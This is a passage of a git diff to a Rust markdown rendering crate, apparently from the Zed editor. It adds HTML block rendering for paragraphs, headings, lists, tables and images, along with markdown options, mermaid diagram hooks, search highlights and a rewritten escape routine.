HtmlParagraph, 
HtmlParagraphChunk, ParsedHtmlBlock, + ParsedHtmlElement, ParsedHtmlList, ParsedHtmlListItemType, ParsedHtmlTable, ParsedHtmlTableRow, + ParsedHtmlText, +}; +use crate::{MarkdownElement, MarkdownElementBuilder}; + +pub(crate) struct HtmlSourceAllocator { + source_range: Range, + next_source_index: usize, +} + +impl HtmlSourceAllocator { + pub(crate) fn new(source_range: Range) -> Self { + Self { + next_source_index: source_range.start, + source_range, + } + } + + pub(crate) fn allocate(&mut self, requested_len: usize) -> Range { + let remaining = self.source_range.end.saturating_sub(self.next_source_index); + let len = requested_len.min(remaining); + let start = self.next_source_index; + let end = start + len; + self.next_source_index = end; + start..end + } +} + +impl MarkdownElement { + pub(crate) fn render_html_block( + &self, + block: &ParsedHtmlBlock, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + let mut source_allocator = HtmlSourceAllocator::new(block.source_range.clone()); + self.render_html_elements( + &block.children, + &mut source_allocator, + builder, + markdown_end, + cx, + ); + } + + fn render_html_elements( + &self, + elements: &[ParsedHtmlElement], + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + for element in elements { + self.render_html_element(element, source_allocator, builder, markdown_end, cx); + } + } + + fn render_html_element( + &self, + element: &ParsedHtmlElement, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + let Some(source_range) = element.source_range() else { + return; + }; + + match element { + ParsedHtmlElement::Paragraph(paragraph) => { + self.push_markdown_paragraph(builder, &source_range, markdown_end); + self.render_html_paragraph(paragraph, source_allocator, builder, cx, markdown_end); + builder.pop_div(); + } + 
ParsedHtmlElement::Heading(heading) => { + self.push_markdown_heading( + builder, + heading.level, + &heading.source_range, + markdown_end, + ); + self.render_html_paragraph( + &heading.contents, + source_allocator, + builder, + cx, + markdown_end, + ); + self.pop_markdown_heading(builder); + } + ParsedHtmlElement::List(list) => { + self.render_html_list(list, source_allocator, builder, markdown_end, cx); + } + ParsedHtmlElement::BlockQuote(block_quote) => { + self.push_markdown_block_quote(builder, &block_quote.source_range, markdown_end); + self.render_html_elements( + &block_quote.children, + source_allocator, + builder, + markdown_end, + cx, + ); + self.pop_markdown_block_quote(builder); + } + ParsedHtmlElement::Table(table) => { + self.render_html_table(table, source_allocator, builder, markdown_end, cx); + } + ParsedHtmlElement::Image(image) => { + self.render_html_image(image, builder); + } + } + } + + fn render_html_list( + &self, + list: &ParsedHtmlList, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + builder.push_div(div().pl_2p5(), &list.source_range, markdown_end); + + for list_item in &list.items { + let bullet = match list_item.item_type { + ParsedHtmlListItemType::Ordered(order) => html_list_item_prefix( + order as usize, + list.ordered, + list.depth.saturating_sub(1) as usize, + ), + ParsedHtmlListItemType::Unordered => { + html_list_item_prefix(1, false, list.depth.saturating_sub(1) as usize) + } + }; + + self.push_markdown_list_item( + builder, + div().child(bullet).into_any_element(), + &list_item.source_range, + markdown_end, + ); + self.render_html_elements( + &list_item.content, + source_allocator, + builder, + markdown_end, + cx, + ); + self.pop_markdown_list_item(builder); + } + + builder.pop_div(); + } + + fn render_html_table( + &self, + table: &ParsedHtmlTable, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + 
markdown_end: usize, + cx: &mut App, + ) { + if let Some(caption) = &table.caption { + builder.push_div( + div().when(!self.style.height_is_multiple_of_line_height, |el| { + el.mb_2().line_height(rems(1.3)) + }), + &table.source_range, + markdown_end, + ); + self.render_html_paragraph(caption, source_allocator, builder, cx, markdown_end); + builder.pop_div(); + } + + let actual_header_column_count = html_table_columns_count(&table.header); + let actual_body_column_count = html_table_columns_count(&table.body); + let max_column_count = actual_header_column_count.max(actual_body_column_count); + + if max_column_count == 0 { + return; + } + + let total_rows = table.header.len() + table.body.len(); + let mut grid_occupied = vec![vec![false; max_column_count]; total_rows]; + + builder.push_div( + div() + .id(("html-table", table.source_range.start)) + .grid() + .grid_cols(max_column_count as u16) + .when(self.style.table_columns_min_size, |this| { + this.grid_cols_min_content(max_column_count as u16) + }) + .when(!self.style.table_columns_min_size, |this| { + this.grid_cols(max_column_count as u16) + }) + .w_full() + .mb_2() + .border(px(1.5)) + .border_color(cx.theme().colors().border) + .rounded_sm() + .overflow_hidden(), + &table.source_range, + markdown_end, + ); + + for (row_index, row) in table.header.iter().chain(table.body.iter()).enumerate() { + let mut column_index = 0; + + for cell in &row.columns { + while column_index < max_column_count && grid_occupied[row_index][column_index] { + column_index += 1; + } + + if column_index >= max_column_count { + break; + } + + let max_span = max_column_count.saturating_sub(column_index); + let mut cell_div = div() + .col_span(cell.col_span.min(max_span) as u16) + .row_span(cell.row_span.min(total_rows - row_index) as u16) + .when(column_index > 0, |this| this.border_l_1()) + .when(row_index > 0, |this| this.border_t_1()) + .border_color(cx.theme().colors().border) + .px_2() + .py_1() + .when(cell.is_header, |this| { + 
this.bg(cx.theme().colors().title_bar_background) + }) + .when(!cell.is_header && row_index % 2 == 1, |this| { + this.bg(cx.theme().colors().panel_background) + }); + + cell_div = match cell.alignment { + Alignment::Center => cell_div.items_center(), + Alignment::Right => cell_div.items_end(), + _ => cell_div, + }; + + builder.push_div(cell_div, &table.source_range, markdown_end); + self.render_html_paragraph( + &cell.children, + source_allocator, + builder, + cx, + markdown_end, + ); + builder.pop_div(); + + for row_offset in 0..cell.row_span { + for column_offset in 0..cell.col_span { + if row_index + row_offset < total_rows + && column_index + column_offset < max_column_count + { + grid_occupied[row_index + row_offset][column_index + column_offset] = + true; + } + } + } + + column_index += cell.col_span; + } + + while column_index < max_column_count { + if grid_occupied[row_index][column_index] { + column_index += 1; + continue; + } + + builder.push_div( + div() + .when(column_index > 0, |this| this.border_l_1()) + .when(row_index > 0, |this| this.border_t_1()) + .border_color(cx.theme().colors().border) + .when(row_index % 2 == 1, |this| { + this.bg(cx.theme().colors().panel_background) + }), + &table.source_range, + markdown_end, + ); + builder.pop_div(); + column_index += 1; + } + } + + builder.pop_div(); + } + + fn render_html_paragraph( + &self, + paragraph: &HtmlParagraph, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + cx: &mut App, + _markdown_end: usize, + ) { + for chunk in paragraph { + match chunk { + HtmlParagraphChunk::Text(text) => { + self.render_html_text(text, source_allocator, builder, cx); + } + HtmlParagraphChunk::Image(image) => { + self.render_html_image(image, builder); + } + } + } + } + + fn render_html_text( + &self, + text: &ParsedHtmlText, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + cx: &mut App, + ) { + let text_contents = text.contents.as_ref(); + if 
text_contents.is_empty() { + return; + } + + let allocated_range = source_allocator.allocate(text_contents.len()); + let allocated_len = allocated_range.end.saturating_sub(allocated_range.start); + + let mut boundaries = vec![0, text_contents.len()]; + for (range, _) in &text.highlights { + boundaries.push(range.start); + boundaries.push(range.end); + } + for (range, _) in &text.links { + boundaries.push(range.start); + boundaries.push(range.end); + } + boundaries.sort_unstable(); + boundaries.dedup(); + + for segment in boundaries.windows(2) { + let start = segment[0]; + let end = segment[1]; + if start >= end { + continue; + } + + let source_start = allocated_range.start + start.min(allocated_len); + let source_end = allocated_range.start + end.min(allocated_len); + if source_start >= source_end { + continue; + } + + let mut refinement = TextStyleRefinement::default(); + let mut has_refinement = false; + + for (highlight_range, style) in &text.highlights { + if highlight_range.start < end && highlight_range.end > start { + apply_html_highlight_style(&mut refinement, style); + has_refinement = true; + } + } + + let link = text.links.iter().find_map(|(link_range, link)| { + if link_range.start < end && link_range.end > start { + Some(link.clone()) + } else { + None + } + }); + + if let Some(link) = link.as_ref() { + builder.push_link(link.clone(), source_start..source_end); + let link_style = self + .style + .link_callback + .as_ref() + .and_then(|callback| callback(link.as_ref(), cx)) + .unwrap_or_else(|| self.style.link.clone()); + builder.push_text_style(link_style); + } + + if has_refinement { + builder.push_text_style(refinement); + } + + builder.push_text(&text_contents[start..end], source_start..source_end); + + if has_refinement { + builder.pop_text_style(); + } + + if link.is_some() { + builder.pop_text_style(); + } + } + } + + fn render_html_image(&self, image: &HtmlImage, builder: &mut MarkdownElementBuilder) { + let Some(source) = self + .image_resolver 
+ .as_ref() + .and_then(|resolve| resolve(image.dest_url.as_ref())) + else { + return; + }; + + self.push_markdown_image( + builder, + &image.source_range, + source, + image.width, + image.height, + ); + } +} + +fn apply_html_highlight_style(refinement: &mut TextStyleRefinement, style: &HtmlHighlightStyle) { + if style.weight != FontWeight::default() { + refinement.font_weight = Some(style.weight); + } + + if style.oblique { + refinement.font_style = Some(FontStyle::Oblique); + } else if style.italic { + refinement.font_style = Some(FontStyle::Italic); + } + + if style.underline { + refinement.underline = Some(UnderlineStyle { + thickness: px(1.), + color: None, + ..Default::default() + }); + } + + if style.strikethrough { + refinement.strikethrough = Some(StrikethroughStyle { + thickness: px(1.), + color: None, + }); + } +} + +fn html_list_item_prefix(order: usize, ordered: bool, depth: usize) -> String { + let index = order.saturating_sub(1); + const NUMBERED_PREFIXES_1: &str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; + const NUMBERED_PREFIXES_2: &str = "abcdefghijklmnopqrstuvwxyz"; + const BULLETS: [&str; 5] = ["•", "◦", "▪", "‣", "⁃"]; + + if ordered { + match depth { + 0 => format!("{}. ", order), + 1 => format!( + "{}. ", + NUMBERED_PREFIXES_1 + .chars() + .nth(index % NUMBERED_PREFIXES_1.len()) + .unwrap() + ), + _ => format!( + "{}. 
", + NUMBERED_PREFIXES_2 + .chars() + .nth(index % NUMBERED_PREFIXES_2.len()) + .unwrap() + ), + } + } else { + let depth = depth.min(BULLETS.len() - 1); + format!("{} ", BULLETS[depth]) + } +} + +fn html_table_columns_count(rows: &[ParsedHtmlTableRow]) -> usize { + let mut actual_column_count = 0; + for row in rows { + actual_column_count = actual_column_count.max( + row.columns + .iter() + .map(|column| column.col_span) + .sum::(), + ); + } + actual_column_count +} + +#[cfg(test)] +mod tests { + use gpui::{TestAppContext, size}; + use ui::prelude::*; + + use crate::{ + CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownOptions, + MarkdownStyle, + }; + + fn ensure_theme_initialized(cx: &mut TestAppContext) { + cx.update(|cx| { + if !cx.has_global::() { + settings::init(cx); + } + if !cx.has_global::() { + theme_settings::init(theme::LoadThemes::JustBase, cx); + } + }); + } + + fn render_markdown_text(markdown: &str, cx: &mut TestAppContext) -> crate::RenderedText { + struct TestWindow; + + impl Render for TestWindow { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + div() + } + } + + ensure_theme_initialized(cx); + + let (_, cx) = cx.add_window_view(|_, _| TestWindow); + let markdown = cx.new(|cx| Markdown::new(markdown.to_string().into(), None, None, cx)); + cx.run_until_parked(); + let (rendered, _) = cx.draw( + Default::default(), + size(px(600.0), px(600.0)), + |_window, _cx| { + MarkdownElement::new(markdown, MarkdownStyle::default()).code_block_renderer( + CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }, + ) + }, + ); + rendered.text + } + + #[gpui::test] + fn test_html_block_rendering_smoke(cx: &mut TestAppContext) { + let rendered = render_markdown_text( + "

Hello

world

  • item
", + cx, + ); + + let rendered_lines = rendered + .lines + .iter() + .map(|line| line.layout.wrapped_text()) + .collect::>(); + + assert_eq!( + rendered_lines.concat().replace('\n', ""), + "

Hello

world

  • item
" + ); + } + + #[gpui::test] + fn test_html_block_rendering_can_be_enabled(cx: &mut TestAppContext) { + struct TestWindow; + + impl Render for TestWindow { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + div() + } + } + + ensure_theme_initialized(cx); + + let (_, cx) = cx.add_window_view(|_, _| TestWindow); + let markdown = cx.new(|cx| { + Markdown::new_with_options( + "

Hello

world

  • item
".into(), + None, + None, + MarkdownOptions { + parse_html: true, + ..Default::default() + }, + cx, + ) + }); + cx.run_until_parked(); + let (rendered, _) = cx.draw( + Default::default(), + size(px(600.0), px(600.0)), + |_window, _cx| { + MarkdownElement::new(markdown, MarkdownStyle::default()).code_block_renderer( + CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }, + ) + }, + ); + + let rendered_lines = rendered + .text + .lines + .iter() + .map(|line| line.layout.wrapped_text()) + .collect::>(); + + assert_eq!(rendered_lines[0], "Hello"); + assert_eq!(rendered_lines[1], "world"); + assert!(rendered_lines.iter().any(|line| line.contains("item"))); + } +} diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index 1cd19ffb8f7cfa16ab1aa95af9425690aba78707..247c082d223005a7e0bd6d57696751ce76cc4d86 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -1,3 +1,5 @@ +pub mod html; +mod mermaid; pub mod parser; mod path_range; @@ -7,14 +9,19 @@ use gpui::EdgesRefinement; use gpui::HitboxBehavior; use gpui::UnderlineStyle; use language::LanguageName; + use log::Level; +use mermaid::{ + MermaidState, ParsedMarkdownMermaidDiagram, extract_mermaid_diagrams, render_mermaid_diagram, +}; pub use path_range::{LineCol, PathWithRange}; use settings::Settings as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::Checkbox; use ui::CopyButton; use std::borrow::Cow; +use std::collections::BTreeMap; use std::iter; use std::mem; use std::ops::Range; @@ -27,13 +34,16 @@ use collections::{HashMap, HashSet}; use gpui::{ AnyElement, App, BorderStyle, Bounds, ClipboardItem, CursorStyle, DispatchPhase, Edges, Entity, FocusHandle, Focusable, FontStyle, FontWeight, GlobalElementId, Hitbox, Hsla, Image, - ImageFormat, KeyContext, Length, MouseButton, MouseDownEvent, MouseEvent, MouseMoveEvent, - MouseUpEvent, Point, ScrollHandle, Stateful, StrikethroughStyle, 
StyleRefinement, StyledText, - Task, TextLayout, TextRun, TextStyle, TextStyleRefinement, actions, img, point, quad, + ImageFormat, ImageSource, KeyContext, Length, MouseButton, MouseDownEvent, MouseEvent, + MouseMoveEvent, MouseUpEvent, Point, ScrollHandle, Stateful, StrikethroughStyle, + StyleRefinement, StyledText, Task, TextLayout, TextRun, TextStyle, TextStyleRefinement, + actions, img, point, quad, }; use language::{CharClassifier, Language, LanguageRegistry, Rope}; use parser::CodeBlockMetadata; -use parser::{MarkdownEvent, MarkdownTag, MarkdownTagEnd, parse_links_only, parse_markdown}; +use parser::{ + MarkdownEvent, MarkdownTag, MarkdownTagEnd, parse_links_only, parse_markdown_with_options, +}; use pulldown_cmark::Alignment; use sum_tree::TreeMap; use theme::SyntaxTheme; @@ -45,7 +55,8 @@ use crate::parser::CodeBlockKind; /// A callback function that can be used to customize the style of links based on the destination URL. /// If the callback returns `None`, the default link style will be used. 
type LinkStyleCallback = Rc Option>; - +type SourceClickCallback = Box bool>; +type CheckboxToggleCallback = Rc, bool, &mut Window, &mut App)>; /// Defines custom style refinements for each heading level (H1-H6) #[derive(Clone, Default)] pub struct HeadingLevelStyles { @@ -143,6 +154,8 @@ impl MarkdownStyle { base_text_style: text_style.clone(), syntax: cx.theme().syntax().clone(), selection_background_color: colors.element_selection_background, + rule_color: colors.border, + block_quote_border_color: colors.border, code_block_overflow_x_scroll: true, heading_level_styles: Some(HeadingLevelStyles { h1: Some(TextStyleRefinement { @@ -237,6 +250,7 @@ pub struct Markdown { selection: Selection, pressed_link: Option, autoscroll_request: Option, + active_root_block: Option, parsed_markdown: ParsedMarkdown, images_by_source_offset: HashMap>, should_reparse: bool, @@ -244,20 +258,32 @@ pub struct Markdown { focus_handle: FocusHandle, language_registry: Option>, fallback_code_block_language: Option, - options: Options, + options: MarkdownOptions, + mermaid_state: MermaidState, copied_code_blocks: HashSet, - code_block_scroll_handles: HashMap, + code_block_scroll_handles: BTreeMap, context_menu_selected_text: Option, + search_highlights: Vec>, + active_search_highlight: Option, } -struct Options { - parse_links_only: bool, +#[derive(Clone, Copy, Default)] +pub struct MarkdownOptions { + pub parse_links_only: bool, + pub parse_html: bool, + pub render_mermaid_diagrams: bool, +} + +#[derive(Clone, Copy, PartialEq, Eq)] +pub enum CopyButtonVisibility { + Hidden, + AlwaysVisible, + VisibleOnHover, } pub enum CodeBlockRenderer { Default { - copy_button: bool, - copy_button_on_hover: bool, + copy_button_visibility: CopyButtonVisibility, border: bool, }, Custom { @@ -292,12 +318,100 @@ actions!( ] ); +enum EscapeAction { + PassThrough, + Nbsp(usize), + DoubleNewline, + PrefixBackslash, +} + +impl EscapeAction { + fn output_len(&self) -> usize { + match self { + Self::PassThrough 
=> 1, + Self::Nbsp(count) => count * '\u{00A0}'.len_utf8(), + Self::DoubleNewline => 2, + Self::PrefixBackslash => 2, + } + } + + fn write_to(&self, c: char, output: &mut String) { + match self { + Self::PassThrough => output.push(c), + Self::Nbsp(count) => { + for _ in 0..*count { + output.push('\u{00A0}'); + } + } + Self::DoubleNewline => { + output.push('\n'); + output.push('\n'); + } + Self::PrefixBackslash => { + // '\\' is a single backslash in Rust, e.g. '|' -> '\|' + output.push('\\'); + output.push(c); + } + } + } +} + +// Valid to operate on raw bytes since multi-byte UTF-8 +// sequences never contain ASCII-range bytes. +struct MarkdownEscaper { + in_leading_whitespace: bool, +} + +impl MarkdownEscaper { + const TAB_SIZE: usize = 4; + + fn new() -> Self { + Self { + in_leading_whitespace: true, + } + } + + fn next(&mut self, byte: u8) -> EscapeAction { + let action = if self.in_leading_whitespace && byte == b'\t' { + EscapeAction::Nbsp(Self::TAB_SIZE) + } else if self.in_leading_whitespace && byte == b' ' { + EscapeAction::Nbsp(1) + } else if byte == b'\n' { + EscapeAction::DoubleNewline + } else if byte.is_ascii_punctuation() { + EscapeAction::PrefixBackslash + } else { + EscapeAction::PassThrough + }; + + self.in_leading_whitespace = + byte == b'\n' || (self.in_leading_whitespace && (byte == b' ' || byte == b'\t')); + action + } +} + impl Markdown { pub fn new( source: SharedString, language_registry: Option>, fallback_code_block_language: Option, cx: &mut Context, + ) -> Self { + Self::new_with_options( + source, + language_registry, + fallback_code_block_language, + MarkdownOptions::default(), + cx, + ) + } + + pub fn new_with_options( + source: SharedString, + language_registry: Option>, + fallback_code_block_language: Option, + options: MarkdownOptions, + cx: &mut Context, ) -> Self { let focus_handle = cx.focus_handle(); let mut this = Self { @@ -305,6 +419,7 @@ impl Markdown { selection: Selection::default(), pressed_link: None, 
autoscroll_request: None, + active_root_block: None, should_reparse: false, images_by_source_offset: Default::default(), parsed_markdown: ParsedMarkdown::default(), @@ -312,40 +427,29 @@ impl Markdown { focus_handle, language_registry, fallback_code_block_language, - options: Options { - parse_links_only: false, - }, + options, + mermaid_state: MermaidState::default(), copied_code_blocks: HashSet::default(), - code_block_scroll_handles: HashMap::default(), + code_block_scroll_handles: BTreeMap::default(), context_menu_selected_text: None, + search_highlights: Vec::new(), + active_search_highlight: None, }; this.parse(cx); this } pub fn new_text(source: SharedString, cx: &mut Context) -> Self { - let focus_handle = cx.focus_handle(); - let mut this = Self { + Self::new_with_options( source, - selection: Selection::default(), - pressed_link: None, - autoscroll_request: None, - should_reparse: false, - parsed_markdown: ParsedMarkdown::default(), - images_by_source_offset: Default::default(), - pending_parse: None, - focus_handle, - language_registry: None, - fallback_code_block_language: None, - options: Options { + None, + None, + MarkdownOptions { parse_links_only: true, + ..Default::default() }, - copied_code_blocks: HashSet::default(), - code_block_scroll_handles: HashMap::default(), - context_menu_selected_text: None, - }; - this.parse(cx); - this + cx, + ) } fn code_block_scroll_handle(&mut self, id: usize) -> ScrollHandle { @@ -364,6 +468,32 @@ impl Markdown { self.code_block_scroll_handles.clear(); } + fn autoscroll_code_block(&self, source_index: usize, cursor_position: Point) { + let Some((_, scroll_handle)) = self + .code_block_scroll_handles + .range(..=source_index) + .next_back() + else { + return; + }; + + let bounds = scroll_handle.bounds(); + if cursor_position.y < bounds.top() || cursor_position.y > bounds.bottom() { + return; + } + + let horizontal_delta = if cursor_position.x < bounds.left() { + bounds.left() - cursor_position.x + } else if 
cursor_position.x > bounds.right() { + bounds.right() - cursor_position.x + } else { + return; + }; + + let offset = scroll_handle.offset(); + scroll_handle.set_offset(point(offset.x + horizontal_delta, offset.y)); + } + pub fn is_parsing(&self) -> bool { self.pending_parse.is_some() } @@ -382,6 +512,30 @@ impl Markdown { self.parse(cx); } + pub fn request_autoscroll_to_source_index( + &mut self, + source_index: usize, + cx: &mut Context, + ) { + self.autoscroll_request = Some(source_index); + cx.refresh_windows(); + } + + pub fn set_active_root_for_source_index( + &mut self, + source_index: Option, + cx: &mut Context, + ) { + let active_root_block = + source_index.and_then(|index| self.parsed_markdown.root_block_for_source_index(index)); + if self.active_root_block == active_root_block { + return; + } + + self.active_root_block = active_root_block; + cx.notify(); + } + pub fn reset(&mut self, source: SharedString, cx: &mut Context) { if source == self.source() { return; @@ -391,6 +545,8 @@ impl Markdown { self.autoscroll_request = None; self.pending_parse = None; self.should_reparse = false; + self.search_highlights.clear(); + self.active_search_highlight = None; // Don't clear parsed_markdown here - keep existing content visible until new parse completes self.parse(cx); } @@ -401,30 +557,21 @@ impl Markdown { } pub fn escape(s: &str) -> Cow<'_, str> { - // Valid to use bytes since multi-byte UTF-8 doesn't use ASCII chars. 
- let count = s - .bytes() - .filter(|c| *c == b'\n' || c.is_ascii_punctuation()) - .count(); - if count > 0 { - let mut output = String::with_capacity(s.len() + count); - let mut is_newline = false; - for c in s.chars() { - if is_newline && c == ' ' { - continue; - } - is_newline = c == '\n'; - if c == '\n' { - output.push('\n') - } else if c.is_ascii_punctuation() { - output.push('\\') - } - output.push(c) - } - output.into() - } else { - s.into() + let output_len: usize = { + let mut escaper = MarkdownEscaper::new(); + s.bytes().map(|byte| escaper.next(byte).output_len()).sum() + }; + + if output_len == s.len() { + return s.into(); } + + let mut escaper = MarkdownEscaper::new(); + let mut output = String::with_capacity(output_len); + for c in s.chars() { + escaper.next(c as u8).write_to(c, &mut output); + } + output.into() } pub fn selected_text(&self) -> Option { @@ -435,6 +582,40 @@ impl Markdown { } } + pub fn set_search_highlights( + &mut self, + highlights: Vec>, + active: Option, + cx: &mut Context, + ) { + self.search_highlights = highlights; + self.active_search_highlight = active; + cx.notify(); + } + + pub fn clear_search_highlights(&mut self, cx: &mut Context) { + if !self.search_highlights.is_empty() || self.active_search_highlight.is_some() { + self.search_highlights.clear(); + self.active_search_highlight = None; + cx.notify(); + } + } + + pub fn set_active_search_highlight(&mut self, active: Option, cx: &mut Context) { + if self.active_search_highlight != active { + self.active_search_highlight = active; + cx.notify(); + } + } + + pub fn search_highlights(&self) -> &[Range] { + &self.search_highlights + } + + pub fn active_search_highlight(&self) -> Option { + self.active_search_highlight + } + fn copy(&self, text: &RenderedText, _: &mut Window, cx: &mut Context) { if self.selection.end <= self.selection.start { return; @@ -461,6 +642,17 @@ impl Markdown { fn parse(&mut self, cx: &mut Context) { if self.source.is_empty() { + self.should_reparse = 
false; + self.pending_parse.take(); + self.parsed_markdown = ParsedMarkdown { + source: self.source.clone(), + ..Default::default() + }; + self.active_root_block = None; + self.images_by_source_offset.clear(); + self.mermaid_state.clear(); + cx.notify(); + cx.refresh_windows(); return; } @@ -475,6 +667,8 @@ impl Markdown { fn start_background_parse(&self, cx: &Context) -> Task<()> { let source = self.source.clone(); let should_parse_links_only = self.options.parse_links_only; + let should_parse_html = self.options.parse_html; + let should_render_mermaid_diagrams = self.options.render_mermaid_diagrams; let language_registry = self.language_registry.clone(); let fallback = self.fallback_code_block_language.clone(); @@ -486,12 +680,25 @@ impl Markdown { source, languages_by_name: TreeMap::default(), languages_by_path: TreeMap::default(), + root_block_starts: Arc::default(), + html_blocks: BTreeMap::default(), + mermaid_diagrams: BTreeMap::default(), }, Default::default(), ); } - let (events, language_names, paths) = parse_markdown(&source); + let parsed = parse_markdown_with_options(&source, should_parse_html); + let events = parsed.events; + let language_names = parsed.language_names; + let paths = parsed.language_paths; + let root_block_starts = parsed.root_block_starts; + let html_blocks = parsed.html_blocks; + let mermaid_diagrams = if should_render_mermaid_diagrams { + extract_mermaid_diagrams(&source, &events) + } else { + BTreeMap::default() + }; let mut images_by_source_offset = HashMap::default(); let mut languages_by_name = TreeMap::default(); let mut languages_by_path = TreeMap::default(); @@ -550,6 +757,9 @@ impl Markdown { events: Arc::from(events), languages_by_name, languages_by_path, + root_block_starts: Arc::from(root_block_starts), + html_blocks, + mermaid_diagrams, }, images_by_source_offset, ) @@ -561,10 +771,22 @@ impl Markdown { this.update(cx, |this, cx| { this.parsed_markdown = parsed; this.images_by_source_offset = images_by_source_offset; + 
if this.active_root_block.is_some_and(|block_index| { + block_index >= this.parsed_markdown.root_block_starts.len() + }) { + this.active_root_block = None; + } + if this.options.render_mermaid_diagrams { + let parsed_markdown = this.parsed_markdown.clone(); + this.mermaid_state.update(&parsed_markdown, cx); + } else { + this.mermaid_state.clear(); + } this.pending_parse.take(); if this.should_reparse { this.parse(cx); } + cx.notify(); cx.refresh_windows(); }) .ok(); @@ -658,6 +880,9 @@ pub struct ParsedMarkdown { pub events: Arc<[(Range, MarkdownEvent)]>, pub languages_by_name: TreeMap>, pub languages_by_path: TreeMap, Arc>, + pub root_block_starts: Arc<[usize]>, + pub(crate) html_blocks: BTreeMap, + pub(crate) mermaid_diagrams: BTreeMap, } impl ParsedMarkdown { @@ -668,6 +893,30 @@ impl ParsedMarkdown { pub fn events(&self) -> &Arc<[(Range, MarkdownEvent)]> { &self.events } + + pub fn root_block_starts(&self) -> &Arc<[usize]> { + &self.root_block_starts + } + + pub fn root_block_for_source_index(&self, source_index: usize) -> Option { + if self.root_block_starts.is_empty() { + return None; + } + + let partition = self + .root_block_starts + .partition_point(|block_start| *block_start <= source_index); + + Some(partition.saturating_sub(1)) + } +} + +pub enum AutoscrollBehavior { + /// Propagate the request up the element tree for the nearest + /// scrollable ancestor (e.g. `List`) to handle. + Propagate, + /// Directly control a specific scroll handle. 
+ Controlled(ScrollHandle), } pub struct MarkdownElement { @@ -675,6 +924,11 @@ pub struct MarkdownElement { style: MarkdownStyle, code_block_renderer: CodeBlockRenderer, on_url_click: Option>, + on_source_click: Option, + on_checkbox_toggle: Option, + image_resolver: Option Option>>, + show_root_block_markers: bool, + autoscroll: AutoscrollBehavior, } impl MarkdownElement { @@ -683,11 +937,15 @@ impl MarkdownElement { markdown, style, code_block_renderer: CodeBlockRenderer::Default { - copy_button: true, - copy_button_on_hover: false, + copy_button_visibility: CopyButtonVisibility::VisibleOnHover, border: false, }, on_url_click: None, + on_source_click: None, + on_checkbox_toggle: None, + image_resolver: None, + show_root_block_markers: false, + autoscroll: AutoscrollBehavior::Propagate, } } @@ -725,18 +983,159 @@ impl MarkdownElement { self } - fn paint_selection( + pub fn on_source_click( + mut self, + handler: impl Fn(usize, usize, &mut Window, &mut App) -> bool + 'static, + ) -> Self { + self.on_source_click = Some(Box::new(handler)); + self + } + + pub fn on_checkbox_toggle( + mut self, + handler: impl Fn(Range, bool, &mut Window, &mut App) + 'static, + ) -> Self { + self.on_checkbox_toggle = Some(Rc::new(handler)); + self + } + + pub fn image_resolver( + mut self, + resolver: impl Fn(&str) -> Option + 'static, + ) -> Self { + self.image_resolver = Some(Box::new(resolver)); + self + } + + pub fn show_root_block_markers(mut self) -> Self { + self.show_root_block_markers = true; + self + } + + pub fn scroll_handle(mut self, scroll_handle: ScrollHandle) -> Self { + self.autoscroll = AutoscrollBehavior::Controlled(scroll_handle); + self + } + + fn push_markdown_image( &self, + builder: &mut MarkdownElementBuilder, + range: &Range, + source: ImageSource, + width: Option, + height: Option, + ) { + builder.modify_current_div(|el| { + el.items_center().flex().flex_row().child( + img(source) + .max_w_full() + .when_some(height, |this, height| this.h(height)) + 
.when_some(width, |this, width| this.w(width)), + ) + }); + let _ = range; + } + + fn push_markdown_paragraph( + &self, + builder: &mut MarkdownElementBuilder, + range: &Range, + markdown_end: usize, + ) { + builder.push_div( + div().when(!self.style.height_is_multiple_of_line_height, |el| { + el.mb_2().line_height(rems(1.3)) + }), + range, + markdown_end, + ); + } + + fn push_markdown_heading( + &self, + builder: &mut MarkdownElementBuilder, + level: pulldown_cmark::HeadingLevel, + range: &Range, + markdown_end: usize, + ) { + let mut heading = div().mb_2(); + heading = apply_heading_style(heading, level, self.style.heading_level_styles.as_ref()); + + let mut heading_style = self.style.heading.clone(); + let heading_text_style = heading_style.text_style().clone(); + heading.style().refine(&heading_style); + + builder.push_text_style(heading_text_style); + builder.push_div(heading, range, markdown_end); + } + + fn pop_markdown_heading(&self, builder: &mut MarkdownElementBuilder) { + builder.pop_div(); + builder.pop_text_style(); + } + + fn push_markdown_block_quote( + &self, + builder: &mut MarkdownElementBuilder, + range: &Range, + markdown_end: usize, + ) { + builder.push_text_style(self.style.block_quote.clone()); + builder.push_div( + div() + .pl_4() + .mb_2() + .border_l_4() + .border_color(self.style.block_quote_border_color), + range, + markdown_end, + ); + } + + fn pop_markdown_block_quote(&self, builder: &mut MarkdownElementBuilder) { + builder.pop_div(); + builder.pop_text_style(); + } + + fn push_markdown_list_item( + &self, + builder: &mut MarkdownElementBuilder, + bullet: AnyElement, + range: &Range, + markdown_end: usize, + ) { + builder.push_div( + div() + .when(!self.style.height_is_multiple_of_line_height, |el| { + el.mb_1().gap_1().line_height(rems(1.3)) + }) + .h_flex() + .items_start() + .child(bullet), + range, + markdown_end, + ); + // Without `w_0`, text doesn't wrap to the width of the container. 
